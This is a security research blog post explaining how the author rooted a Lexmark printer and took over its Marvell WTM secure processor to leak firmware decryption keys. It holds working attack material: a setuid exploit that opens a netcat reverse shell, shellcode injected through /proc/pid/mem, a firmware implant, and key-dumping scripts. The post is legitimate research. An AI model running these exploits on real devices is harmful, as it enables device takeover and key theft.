Let's PWN WTM!
[+] Introduction
In the previous blogpost we talked about Lexmark’s attempt to protect their newer printer firmwares with an additional layer of root filesystem encryption, assisted by the Wireless Trusted Module (WTM) that is part of certain Marvell SoCs. We demonstrated that simply replaying some commands to this security processor on a rooted device is enough to turn it into an oracle that can help us decrypt any newer firmware protected by this mechanism. While slightly anticlimactic, we did learn quite a bit about the way WTM works as well.
It’s time to go a bit deeper and explore the other commands supported by the WTM firmware, without going through the existing netlink protocol. We need a way to talk directly to the WTM MMIO interface for starters.
[+] Some assistance from the kernel
Prodding at things like this with a full Linux userland at your disposal has some advantages. You can abstract some of the lower level privileged details away in a kernel module, and script the higher level stuff in something like Python for a quick turnaround when testing out various things. When I broke the Sonos root filesystem encryption I did a similar thing.
So I put together a quick kernel module that would let me peek/poke the WTM MMIO space from userland through sysfs. I also got a quick reminder of how terrible I am at cross-compiling linux kernel modules.
Then, when it was time to load my new hax-assistance LKM, I realized/remembered that the persistent backdoor I was given by Rick did not in fact provide me with a root shell, just a low-privileged one, so I could not even load the module. Let’s fix that first. :)
[+] I can haz root?
Luckily, due to some hints in the bulletin for ZDI-23-670, I was able to replicate a recently-ish fixed privilege escalation which was still present in the firmware running on my printer at this moment. Thank you, SYNACKTIV!
This LPE in /usr/bin/lbtraceapp (a setuid root binary) is hilariously stupid, so I’m going to skim over the explanation and just leave you with the exploit:
#!/bin/sh
echo "-e printk:console /usr/bin/nc 192.168.1.2 9797 -e /bin/sh" > /tmp/f
/usr/bin/lbtraceapp --apply-config=/tmp/f 2>&1
I’m not even sure what lbtraceapp is, to be entirely honest; it appears to be some kind of frontend for ftrace-based event tracing. But we don’t really care at this point, we got our precious root shell. I automated some setup for sshd on the printer while I was at it, to get a more ergonomic shell experience. So we can load the LKM now, yay.
root@ET788C77F816DD:/run/cfs# insmod khax.ko
insmod: ERROR: could not insert module khax.ko: Operation not permitted
What?! Some kind of security policy that prevents us from loading kernel modules? Let’s quickly consult the code for the init_module syscall:
static int may_init_module(void)
{
    if (!capable(CAP_SYS_MODULE) || modules_disabled)
        return -EPERM;
    return 0;
}
SYSCALL_DEFINE3(init_module, void __user *, umod,
        unsigned long, len, const char __user *, uargs)
{
    int err;
    struct load_info info = { };
    err = may_init_module();
    if (err)
        return err;
    // ... 8< .....
    return load_module(&info, uargs, 0);
}
modules_disabled is definitely not true; the kernel in fact has quite a few loaded modules already. Maybe we are missing the CAP_SYS_MODULE capability somehow?
root@ET788C77F816DD:~# cat /proc/self/status | grep '^Cap'
CapInh: 0000000000000000
CapPrm: 00000004002c74e2
CapEff: 00000004002c74e2
CapBnd: 00000004002c74e2
CapAmb: 0000000000000000
The CAP_SYS_MODULE capability is capability number 16 (0x10), which corresponds to bit 0x10000 in the mask. That bit is indeed not set in the capability mask we inherited from our lbtraceapp LPE. Ouch.
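A minimal sketch of that check, assuming only that CAP_SYS_MODULE is capability number 16 (as in linux/capability.h) and that the Cap* lines in /proc/<pid>/status are hexadecimal bitmasks. The helper names parse_cap_masks and has_cap are made up for this illustration.

```python
CAP_SYS_MODULE = 16  # capability number from linux/capability.h


def parse_cap_masks(status_text):
    """Return {'CapEff': int, ...} from the text of /proc/<pid>/status."""
    masks = {}
    for line in status_text.splitlines():
        if line.startswith("Cap"):
            name, value = line.split(":", 1)
            masks[name] = int(value.strip(), 16)
    return masks


def has_cap(mask, cap):
    """True if capability number `cap` is set in the bitmask `mask`."""
    return bool(mask & (1 << cap))


# The two CapEff values shown in this post: our LPE shell and the sleep process.
shell = parse_cap_masks("CapEff:\t00000004002c74e2\n")
sleeper = parse_cap_masks("CapEff:\t0000003fffffffff\n")
print(has_cap(shell["CapEff"], CAP_SYS_MODULE))    # False
print(has_cap(sleeper["CapEff"], CAP_SYS_MODULE))  # True
```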
[+] .. and all capabilities too, please.
So we need some way to elevate our capabilities to be able to load our kernel module. Peeping in the process tree I found this:
root 683 0.0 0.4 2820 2232 ? Ss Jul29 42:23 /bin/bash /usr/bin/wireless-heartbeat.sh
root 2783 0.0 0.0 2216 428 ? S 03:25 0:00 \_ sleep 20
This is a shell script that loops forever and executes /bin/sleep 20 between each action. If we look at the capabilities mask for this sleep process we see:
root@ET788C77F816DD:~# cat /proc/$(pidof sleep)/status | grep '^Cap'
CapInh: 0000000000000000
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
.. this process actually does have a fully enabled capabilities mask. So what if we hijack this process by stomping over some of its code using /proc/pid/mem?
#!/bin/sh
echo "/usr/bin/nohup /usr/sbin/sshd -f /tmp/sshconf &" > /tmp/s2
echo -en '\x10\xd0M\xe25\x00\x8f\xe2\x00\x00\x8d\xe51\x00\x8f\xe2\x04\x00\x8d\xe5\x00\x00\xa0\xe3\x0c\x00\x8d\xe5\r\x10\xa0\xe1\x10\x00\x8f\xe2\x0bp\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01p\xa0\xe3\x00\x00\x00\xef/bin/sh\x00\x00sh\x00\x00/tmp/s2\x00\x00\x00\x00' > /tmp/sc.bin
dd if=/tmp/sc.bin of=/proc/$(pidof sleep)/mem seek=464796 bs=1
This works nicely. We write some shellcode right after some code in .text where the nanosleep syscall is invoked. The shellcode execve’s another shell script from /tmp, and from there we start sshd. Our SSH sessions now actually have a fully permissioned capabilities mask and we can load our kernel module.
root@ET788C77F816DD:/run/cfs# insmod khax.ko
root@ET788C77F816DD:/run/cfs# dmesg | tail
[ 133.200196] HAX: init
[ 133.202809] HAX: Listing all platform devices:
[ 133.202895] HAX: Platform device: (c1a86440) -- d1d20000.wtm-mailbox-controller
[ 133.208959] HAX: WTM base: e0be9000
[ 133.212246] HAX: scratch: virt=ce58f918, phys=e528000
root@ET788C77F816DD:/run/cfs# lsmod | grep hax
khax 16384 0
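The dd invocation used for the hijack above boils down to a positional write into an already existing file. A rough Python equivalent is sketched below; poke_bytes is a hypothetical helper name, and whether a given kernel lets you write to another process's /proc/<pid>/mem depends on its ptrace access rules, so treat this as an illustration only.

```python
import os


def poke_bytes(path, offset, data):
    """Write `data` at absolute `offset` in `path` without truncating it."""
    fd = os.open(path, os.O_WRONLY)
    try:
        written = 0
        while written < len(data):
            # pwrite may write fewer bytes than requested, so loop until done
            written += os.pwrite(fd, data[written:], offset + written)
        return written
    finally:
        os.close(fd)


# Hypothetical usage on the target, with the offset used in the post:
# shellcode = open("/tmp/sc.bin", "rb").read()
# poke_bytes("/proc/%d/mem" % sleep_pid, 464796, shellcode)
```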
[+] The WTM MMIO command interface
Quickly circling back to the OLPC input driver that talks to the WTM in the linux kernel, we find these helpful register offset defines:
#define SECURE_PROCESSOR_COMMAND 0x40
#define COMMAND_RETURN_STATUS 0x80
#define COMMAND_FIFO_STATUS 0xc4
#define PJ_RST_INTERRUPT 0xc8
#define PJ_INTERRUPT_MASK 0xcc
Since the OLPC input driver only needs to transfer a minimal amount of data back and forth, it only needs to deal with a subset of the WTM MMIO space. It clears the SP_COMMAND_COMPLETE_RESET bit in the PJ_RST_INTERRUPT register, writes its command to the SECURE_PROCESSOR_COMMAND register and waits for the COMMAND_FIFO_STATUS register to reach a certain value before reading the response back from the COMMAND_RETURN_STATUS register.
The commands implemented by the wtm-client.ko driver are actually a bit more complex and shove some additional arguments into the command parameter registers, which run from register offset 0x00 up to 0x3c, for a total of 16 DWORDs. Similarly, the response to a command has an additional 16 registers running from offset 0x84 up to 0xc0. In short:
- command input consists of a 32bit “command ID” and up to 64 bytes of data
- command output consists of a 32bit “command response” and up to 64 bytes of data
There are some more bells and whistles in the register map, of course. But for our intents and purposes (sending commands and reading their response in a polled fashion) this is sufficient information for now.
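The register layout described above can be written down as a small sketch. The offsets come from the text; the write32/read32 callables are hypothetical stand-ins for whatever MMIO accessor is available, and the idea that writing the command register last is what kicks off execution is an assumption. Polling for completion is deliberately left out, since the exact status value to wait for is not spelled out here.

```python
PARAM_BASE = 0x00   # 16 parameter DWORDs: 0x00 .. 0x3c
CMD_REG = 0x40      # SECURE_PROCESSOR_COMMAND
STATUS_REG = 0x80   # COMMAND_RETURN_STATUS
RESP_BASE = 0x84    # 16 response DWORDs: 0x84 .. 0xc0
NUM_WORDS = 16


def param_offsets():
    return [PARAM_BASE + 4 * i for i in range(NUM_WORDS)]


def resp_offsets():
    return [RESP_BASE + 4 * i for i in range(NUM_WORDS)]


def stage_command(write32, cmd_id, args):
    """Write the argument DWORDs, then the command ID (assumed trigger)."""
    if len(args) > NUM_WORDS:
        raise ValueError("at most 16 argument DWORDs fit in the parameter registers")
    for off, arg in zip(param_offsets(), args):
        write32(off, arg & 0xFFFFFFFF)
    write32(CMD_REG, cmd_id & 0xFFFFFFFF)


def read_response(read32):
    """Return (status, 64 bytes of response data) once the command is done."""
    status = read32(STATUS_REG)
    data = b"".join(read32(off).to_bytes(4, "little") for off in resp_offsets())
    return status, data
```

With a plain dict as fake register file, stage_command(regs.__setitem__, 0x8003, [0x8005, 0x1000]) fills offsets 0x00, 0x04 and 0x40, which is a handy way to sanity check the layout without hardware.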
[+] LKM Helper primitives
In our little LKM helper module we implement the following primitives:
Command | Arguments | Explanation |
---|---|---|
CMD_WRITE8 | offset, val | write u8 val to MMIO + offset |
CMD_WRITE16 | offset, val | write u16 val to MMIO + offset |
CMD_WRITE32 | offset, val | write u32 val to MMIO + offset |
CMD_READ8 | offset | read u8 from MMIO + offset |
CMD_READ16 | offset | read u16 from MMIO + offset |
CMD_READ32 | offset | read u32 from MMIO + offset |
CMD_GET_SCRATCH | - | get a (physical) pointer to some scratch space |
CMD_WTM_EXEC_CMD | cmd_id, cmd_args | execute WTM command cmd_id with arguments cmd_args |
The ‘scratch space’ is a buffer allocated by the LKM. Some WTM commands expect a physical address containing additional data input/output. By writing to/reading from /dev/mem we can populate this scratch space and read it back in userspace.
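One way to get at a physical address like the scratch buffer from userland is to mmap a window of /dev/mem. The sketch below is an assumption about how this could be done (the daemon may just as well use plain seek/read/write); page_window and read_phys are hypothetical names. The only subtle part is that the mmap offset has to be page aligned, so the requested address is rounded down and the difference is added back when slicing.

```python
import mmap
import os


def page_window(phys_addr, length, page_size=mmap.PAGESIZE):
    """Return (aligned_base, delta, map_len) covering phys_addr .. phys_addr+length."""
    aligned_base = phys_addr - (phys_addr % page_size)
    delta = phys_addr - aligned_base
    # round the mapping length up to a whole number of pages
    map_len = (delta + length + page_size - 1) // page_size * page_size
    return aligned_base, delta, map_len


def read_phys(phys_addr, length, dev="/dev/mem"):
    """Read `length` bytes of physical memory through a /dev/mem mapping."""
    base, delta, map_len = page_window(phys_addr, length)
    fd = os.open(dev, os.O_RDONLY | os.O_SYNC)
    try:
        with mmap.mmap(fd, map_len, mmap.MAP_SHARED, mmap.PROT_READ, offset=base) as m:
            return m[delta:delta + length]
    finally:
        os.close(fd)
```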
[+] Exposing WTM I/O primitives over the network
To further ease exploration, we expose all these primitives using a TCP daemon. Now we can script WTM I/O operations from Python on our own computer, instead of copying scripts to the printer and running them there.
For the sake of clarity here’s a poorly drawn diagram of what we have now:
Python talks over TCP/IP to the small daemon running on the printer in userland.
The small daemon can peek/poke the WTM MMIO interface through khax.ko via sysfs.
The small daemon can also do I/O on the scratch buffer by going through /dev/mem. khax.ko does the actual MMIO operations and the housekeeping of the scratch buffer.
A lovely Rube Goldberg machine.
Now we can do things like:
from wtmclient import *
from util import hexdump
c = WTMClient()
scratch = c.get_scratch()
c.wtm_cmd(WTM_CMD_RNG, [0x80, scratch])
hexdump(c.scratch_read(0, 16))
The whole point is (I’ll just reiterate once again) to avoid recompiling/copying/running. Of course there’s many ways to automate these various tasks, but I’ve always preferred this RPC-ish abstraction of operations.
[+] Wrapped Keys
One of my main interests when it comes to the WTM (keeping in mind the Lexmark printer of course) is this “key (un)wrapping” mechanism. How does it actually work?
The concept of key wrapping is nothing new, of course. You take secret symmetric encryption keys, and you encrypt those with some even more secret keys that are even harder to access. Now your keys have their own keys and then all you need to do is introduce an easy oracle so the whole mechanism becomes useless. ;)
On a high level, the Lexmark rootfs key unwrapping is done by a single netlink command, 0x05 (CMD_AES_OPERATION). Under the hood this command is composed of a few WTM commands, executed in this order: wtm_key_unwrap_load, followed by wtm_aes_init and finally wtm_aes_finish.
Let’s start by analyzing wtm_key_unwrap_load (0x8003). The arguments for this command are u16 cipher_id and u8 *blob. The cipher_id describes what kind of key we are unwrapping.
Some accepted cipher_id values are:
MODE_AES_128_ECB = 0x8000
MODE_AES_256_ECB = 0x8001
MODE_AES_128_CBC = 0x8004
MODE_AES_256_CBC = 0x8005
The blob is formed like this:
struct key_unwrap_blob_t {
    u32 cipher_id_a;
    u32 cipher_id_b;
    u8 iv[16];
    u8 body[0x200];
    u8 digest[0x20];
};
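For poking at these blobs offline, the struct above can be unpacked with Python's struct module. This is a sketch that assumes little-endian fields and no padding between members (neither is stated explicitly here); parse_blob and KeyUnwrapBlob are names invented for the example.

```python
import struct
from collections import namedtuple

# u32 cipher_id_a, u32 cipher_id_b, u8 iv[16], u8 body[0x200], u8 digest[0x20]
BLOB_FMT = "<II16s512s32s"
BLOB_SIZE = struct.calcsize(BLOB_FMT)  # 0x238 bytes

KeyUnwrapBlob = namedtuple("KeyUnwrapBlob", "cipher_id_a cipher_id_b iv body digest")


def parse_blob(raw):
    """Split a raw wrapped-key blob into its (still encrypted) fields."""
    if len(raw) < BLOB_SIZE:
        raise ValueError("blob too short: need 0x%x bytes" % BLOB_SIZE)
    return KeyUnwrapBlob(*struct.unpack(BLOB_FMT, raw[:BLOB_SIZE]))
```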
The high-level and heavily simplified implementation of the wtm_key_unwrap_load command looks something like this:
aes_select_hardware_key()
iv_decrypted = aes_ecb_decrypt(blob->iv, 0x10)
aes_select_hardware_key()
aes_set_iv(iv_decrypted)
body_decrypted = aes_cbc_decrypt(blob->body, 0x200)
if sha256(body_decrypted) == blob->digest:
    aes_state_zeroize()
    aes_load_key(body_decrypted[0x20:0x20+aes_keywidth])
    return 0
else:
    return 0x154
Here aes_select_hardware_key flips a bit in the hardware AES engine’s configuration register that makes it use a hidden/secret key that is completely invisible. First the iv is decrypted, then the encrypted body is decrypted. Finally, a SHA256 digest of the first 0x218 bytes of the blob (which is everything minus the digest), with the now-decrypted values in place, is taken and compared against the digest value from the blob.
If the digest checks out, the AES register state is completely zeroized/reset and the unwrapped key is loaded from the decrypted body at offset +0x20 into the hardware crypto engine’s key registers (different registers for AES, HMAC, etc.).
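The integrity check described above is easy to model in software once you have a blob whose iv and body have been decrypted. The sketch below only covers the digest comparison; the decryption itself needs the hidden hardware key and is out of reach here. digest_matches is a hypothetical helper, and it assumes the digest is stored as the raw 32 SHA-256 output bytes.

```python
import hashlib

DIGEST_OFFSET = 0x218  # cipher_id_a + cipher_id_b + iv + body
DIGEST_SIZE = 0x20


def digest_matches(decrypted_blob):
    """SHA-256 over the first 0x218 bytes, compared to the trailing digest."""
    if len(decrypted_blob) < DIGEST_OFFSET + DIGEST_SIZE:
        raise ValueError("blob too short")
    expected = decrypted_blob[DIGEST_OFFSET:DIGEST_OFFSET + DIGEST_SIZE]
    actual = hashlib.sha256(decrypted_blob[:DIGEST_OFFSET]).digest()
    return actual == expected
```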
So there’s two unknowns (for us) here. First the secret hardware key, and secondly the unwrapped key from the decrypted keyblob, which is loaded directly into the AES engine.
This unwrapped key is then used (in Lexmark’s case) to decrypt the encrypted root filesystem key.
While digging through the (quite extensive) command list in the WTM firmware I found some commands with peculiar names:
0x3001: wtm_load_engine_context
0x3002: wtm_store_engine_context
0x3003: wtm_load_engine_context_external
0x3004: wtm_store_engine_context_external
After reversing them I learned they are used to save/restore the crypto engine state. The _external variants will save/load the state to/from some DRAM address we provide. Let’s see what state is actually preserved when saving, for the AES engine:
int __fastcall aes_store_context(int a1)
{
    mem_move32(a1 + 0x10, 0xD1D21000, 7);
    mem_move32(a1 + 0x68, 0xD1D21058, 21);
    return 0;
}
0xD1D21000 is the base address for the AES engine MMIO. So it saves 7 registers starting at offset 0x00, and another 21 registers starting at offset 0x58. These are spilled to a DRAM address we provide (at offset 0x10 and 0x68 respectively).
Let’s have a look at the register map for the AES engine, as far as I’ve managed to infer by looking at code, anyway:
0x00: CONTROL
..
0x0c: STATUS
..
0x18: SIZE
[0x78 .. 0x98]: KEY
[0x98 .. 0xA8]: IV
Yes sorry, quite some gaps and unknowns. But importantly, the KEY registers are actually preserved when this wtm_store_engine_context_external command is invoked.
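To work out where a given AES register ends up in the saved context, the two mem_move32 calls can be turned into a small lookup. This sketch assumes each saved register is one 32-bit word and that the copy is linear; ctx_offset is a name made up for the example.

```python
# (first register offset, register count, offset in the context buffer),
# taken from the two mem_move32 calls in aes_store_context
SAVED_RANGES = [
    (0x00, 7, 0x10),
    (0x58, 21, 0x68),
]


def ctx_offset(reg_off):
    """Context-buffer offset for an AES register offset, or None if not saved."""
    for first, count, dest in SAVED_RANGES:
        if first <= reg_off < first + 4 * count:
            return dest + (reg_off - first)
    return None


print(hex(ctx_offset(0x78)))  # KEY registers start here: 0x88
print(hex(ctx_offset(0x98)))  # IV registers start here: 0xa8
```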
Let’s try it out with the wrapped keyblob from lexmark:
c = WTMClient()
scratch = c.get_scratch()
# write wkey4 to scratch
c.scratch_write(0, open("wkey4.bin", "rb").read())
# load wrapped key
c.wtm_cmd(WTM_CMD_KEY_UNWRAP_LOAD, [MODE_AES_256_CBC, scratch])
rv = c.io_read32(REG_CMD_RETURN_STATUS)
assert rv == 0
# store AES engine context to scratch buffer
c.scratch_write(0, b"\xAA" * 0x100)
c.wtm_cmd(WTM_CMD_STORE_ENGINE_CONTEXT_EXTERNAL, [MODE_AES_256_CBC, scratch])
rv = c.io_read32(REG_CMD_RETURN_STATUS)
print("Store engine context status: 0x%08x" % rv)
# dump it to the screen
hexdump(c.scratch_read(0, 0x100))
$ python3 test_unwrap.py
Store engine context status: 0x00000000
00000000: aaaa aaaa aaaa aaaa aaaa aaaa 0580 0000 ................
00000010: 0200 0000 0000 0000 0000 0000 0000 0000 ................
00000020: 0000 0000 0000 0000 0000 0000 aaaa aaaa ................
00000030: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa ................
00000040: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa ................
00000050: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa ................
00000060: aaaa aaaa aaaa aaaa 0000 0000 0000 0000 ................
00000070: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000080: 0000 0000 0000 0000 7930 6820 6430 3064 .........}d*.t./
00000090: 2c20 6730 2064 756d 7020 6a30 3072 2030 $O....U58....i.[
000000a0: 776e 206b 3379 7a21 0000 0000 0000 0000 0....=.w........
000000b0: 0000 0000 0000 0000 0100 0000 aaaa aaaa ................
000000c0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa ................
000000d0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa ................
000000e0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa ................
000000f0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa ................
We expect the key bits to be at 0x88 and onwards .. and well what do you know, there actually appears to be data there!
If we do an AES-256-CBC decrypt operation on the encrypted rootFS key, using the IV that is stored alongside the encrypted rootFS key and the key we just dumped from the AES engine state, we do in fact get the correct decrypted rootFS key!
So this intermediary key that is typically not leaving WTM can actually be leaked back, fun. We’re still missing the secret algorithm/key that is used by the AES engine though. What we do gain here is the capability to completely decrypt new root filesystem keys offline as long as the wrapped keys are re-used. Lexmark has already been re-using their wrapped keys in newer firmwares. And new wrapped keys can be unwrapped and dumped for offline usage using our oracle capabilities of course.
[+] Going deeper
All this high-level peeky-pokey of the WTM MMIO interface from the Application Processor side is fun of course, but wouldn’t it be neat if we could get arbitrary code execution on the WTM itself?
There is a ton of commands, surely one of them has a dumb vulnerability? We could audit them all and find something perhaps. We know some of the WTM commands take physical DRAM pointers as arguments, and it can read/write (also through a DMA engine) to them. Makes sense the WTM can access the Application processor’s DRAM.
Is there some dedicated DRAM for the WTM itself, surely they can’t run a full fledged linux kernel entirely from some dedicated SRAM? Or are they.. sharing the same DRAM between the AP and the WTM? That would be naive, right?
Turns out, the WTM’s linux kernel runs entirely from the same DRAM that is fully accessible by the Application Processor. The Wireless Trusted Module™ can be compromised simply by poking into /dev/mem from the Untrusted Module™ (lol) at the right spots.
[+] WTM RCE Strategy
Okay, let’s come up with a strategy here. It would be nice if we could expand our existing exploration infrastructure with another layer of indirection. Since we can already talk to the WTM directly through the MMIO command interface it would be nice to replace some pointless command with some shellcode of our own. The replaced command can then implement some sub-commands to do various operations/primitives, but this time executed from the context of code running on the WTM itself!
I chose to hijack the handler for wtm_dh_shared_key_gen for no good reason other than that its command ID is 0x9001 (it’s over 9000 lololol).
We’re introducing a really basic implant there:
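    cmp   r0, #1            @ sub-command 1: peek32
    beq   cmd_peek32
    cmp   r0, #2            @ sub-command 2: poke32
    beq   cmd_poke32
    mov   r0, #0            @ anything else: do nothing, return 0
    bx    lr
cmd_peek32:
    ldr   r1, [r1]          @ read the word at the address in r1
    str   r1, [r2]          @ store it at the output pointer in r2
    bx    lr
cmd_poke32:
    str   r2, [r1]          @ write the value in r2 to the address in r1
    mov   r0, #0
    bx    lr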
We locate the wtm_dh_shared_key_gen code by scanning through all of DRAM via /dev/mem, and then we stomp over it with our small handler replacement code. Quite lazy, but we can add some powerful new primitives to our WTMClient python codebase now:
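import struct
WTM_CMD_HAX = 0x9001
# sub-command IDs, matching the cmp r0, #1 / #2 checks in the implant
WTM_HAX_CMD_READ32 = 1
WTM_HAX_CMD_WRITE32 = 2
class WTMClient:
    # ... existing methods (wtm_cmd, scratch_read, ...) elided ...
    def wtm_read32(self, addr):
        # the implant stores the word it read into the scratch buffer
        self.wtm_cmd(WTM_CMD_HAX, [WTM_HAX_CMD_READ32, addr, self.scratch])
        return struct.unpack("<L", self.scratch_read(0, 4))[0]
    def wtm_write32(self, addr, value):
        self.wtm_cmd(WTM_CMD_HAX, [WTM_HAX_CMD_WRITE32, addr, value])
    def wtm_clear32(self, addr, value):
        self.wtm_write32(addr, self.wtm_read32(addr) & (~value & 0xFFFFFFFF))
    def wtm_set32(self, addr, value):
        self.wtm_write32(addr, self.wtm_read32(addr) | value)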
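The DRAM scan used to locate the handler can be sketched as a chunked search over a file-like object. This is an illustration under assumptions: the byte signature you search for has to come from your own disassembly of the handler, find_pattern is a hypothetical helper, and on a real /dev/mem some physical ranges may refuse to be read, which this sketch does not handle. The chunks overlap by len(pattern) - 1 bytes so a match straddling a chunk boundary is not missed.

```python
import io


def find_pattern(f, pattern, start, end, chunk_size=1 << 20):
    """Return the absolute offset of the first `pattern` in f[start:end], or -1."""
    if not pattern:
        raise ValueError("empty pattern")
    overlap = len(pattern) - 1
    pos = start
    tail = b""  # last bytes of the previous window, kept for boundary matches
    while pos < end:
        f.seek(pos)
        block = f.read(min(chunk_size, end - pos))
        if not block:
            break
        window = tail + block
        hit = window.find(pattern)
        if hit != -1:
            return pos - len(tail) + hit
        tail = window[-overlap:] if overlap else b""
        pos += len(block)
    return -1


# Self-contained demo on an in-memory buffer instead of /dev/mem:
demo = io.BytesIO(bytes(1000) + b"NEEDLE" + bytes(1000))
print(find_pattern(demo, b"NEEDLE", 0, 2006, chunk_size=7))  # 1000
```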
[+] Now what?
Let’s confirm it works by ehm, reading the WTM BootROM I guess?
from wtmclient import *
c = WTMClient()
ROM_BASE = 0xFFE00000
ROM_SIZE = 0x00020000
rom = b""
for i in range(ROM_SIZE // 4):
    rom += c.wtm_read32(ROM_BASE + i * 4).to_bytes(4, "little")
with open("rom.bin", "wb") as f:
    f.write(rom)
Let’s try to dump the full eFUSE/OTP array while we’re at it. There is a high-level WTM command wtm_otp_block_read (0x2009), but it doesn’t actually provide unrestricted access to the full OTP. It keeps a curated list of entries you can access.
Using our WTM peek/poke implant it’s simple enough to read it out fully by peeking at the right MMIO addresses for the OTP/eFUSE peripheral:
import struct
from wtmclient import *
c = WTMClient()
OTP_BASE = 0xD1D22800
OTP_SIZE = 0x800
o = b""
for i in range(OTP_BASE, OTP_BASE + OTP_SIZE, 4):
    o += struct.pack("<I", c.wtm_read32(i))
with open("otp.bin", "wb") as f:
    f.write(o)
What’s really left (and somewhat worthwhile, for a certain twisted definition of worthwhile) to do though is figuring out how the hidden hardware AES key stuff works. I’ve tried some obvious things like partial key overwrites and whatnot, but so far I haven’t had any luck. That said, I haven’t invested too much time into it either. It’s mostly a prestige thing. Our original goal (dealing with lexmark’s pesky new rootfs encryption) has long been dealt with. ;-)
[+] Conclusion
I had quite some fun working on this software-only OSINT and blackbox-y approach to breaking into the Marvell WTM, and I hope you had some fun reading. The writeup was (as always) done months after the actual hacking, so I hope I didn’t mess up any details. I’ve tried to structure the blogposts as some kind of incremental buildup, but the actual order of my research at the time was very out-of-order with what you read here. I’ve cleaned up a bit and published all the relevant code.
Enjoy!